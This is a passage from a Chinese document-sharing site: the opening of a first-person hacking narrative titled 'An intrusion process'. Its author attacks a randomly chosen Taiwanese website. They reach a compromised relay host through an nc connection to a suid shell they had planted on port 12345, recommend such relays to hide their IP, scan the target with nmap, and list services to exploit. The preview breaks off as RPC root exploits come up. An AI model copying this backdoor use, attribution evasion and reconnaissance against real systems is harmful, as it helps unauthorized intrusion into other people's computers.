网站大量收购独家精品文档,联系QQ:2885784924

一次入侵过程.doc

  1. 1、本文档共21页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
一次入侵过程

一次入侵过程 一次入侵过程 一次入侵过程 入侵过程 -------- by quack 本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告——internet是 有趣但十分脆弱的,当你的计算机放在互联网上给人们提供信息与服务的同时,会引 来网络中的“好奇者”的窥探。而安全性与便利性是一对矛盾……在你对自己的网络 做了一个安全策略考量之后,你应该确定你愿意以多大的风险来使用一些方便的服务, 当然这些服务——比如rlogin,可能只会使你少输入一次密码…… 首先是确定目标——撞大运乱挑一个吧,试试能不能成功……呵,于是登上yahoo,上 taiwan的站点小遛了一下……唔,这个还不错,我们姑且称其为……还 是先ping一下看看情势如何——别碰上有墙的就逊了…… C:\ping Pinging [11] with 32 bytes of data: Reply from 11: bytes=32 time=621ms TTL=241 Reply from 11: bytes=32 time=620ms TTL=241 Reply from 11: bytes=32 time=611ms TTL=241 Reply from 11: bytes=32 time=591ms TTL=241 速度还是很快的嘛……那就开始吧…… 先登上某台跳板台湾的机器——这样安全一些,不会留下你自己的IP……(当然,说句 题外话——这样要追查到还不是很困难,曾经有个朋友同我说过,南方某大学一次被 黑,种种迹象都表明黑客来自美国,IP、更改后主页上留下的话语……朋友受托去补 漏查源,发现那IP是美国一个提供免费shell的服务供应商……于是申请了一个shell, 通过一系列动作成为root,查看系统日志——真相大白,IP居然指向那家大学自身)。 通过跳板还有一个好处——如果你的尝试失败,在系统日志里留下来的是台湾本土的 IP,这样的登陆失败命令比较不会引起系统管理员的注意…… C:\nc ***.***.***.*** 12345 就登上跳板了,12345端口里我预留了一个suid的shell…… 好了,祭起宝刀——nmap…… # ./nmap -sT -O 11 Starting nmap V. 2.3BETA12 by Fyodor (fyodor@, /nmap/) Interesting ports on (11): Port State Protocol Service 7 open tcp echo 9 open tcp discard 19 open tcp chargen 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 79 open tcp finger 80 open tcp http 111 open tcp sunrpc 443 open tcp https 512 open tcp exec 513 open tcp login 514 open tcp shell 515 open tcp printer 540 open tcp uucp 3306 open tcp mysql TCP Sequence Prediction: Class=random positive increments Difficulty=55346 (Worthy challenge) No OS matches for host (If you know what OS is running on it ………… ………… Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds 唔,运气还不错,提供的服务不少,估计漏也少不到哪儿去……只是没判断出系统 类型,这些服务里看上去可以利用的有: Port State Protocol Service 21 open tcp ftp 25 open tcp smtp 79 open tcp finger 80 open tcp http 111 open tcp sunrpc 512 open tcp exec 513 open tcp login 514 open tcp shell 540 open tcp uucp 3306 open tcp mysql 最近rpc攻击非常流行,原因之一恐怕是方便易行——只要存在漏洞,远程就可以 得到一个rootshell……甚至对计算机完全

文档评论(0)

wf93679 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档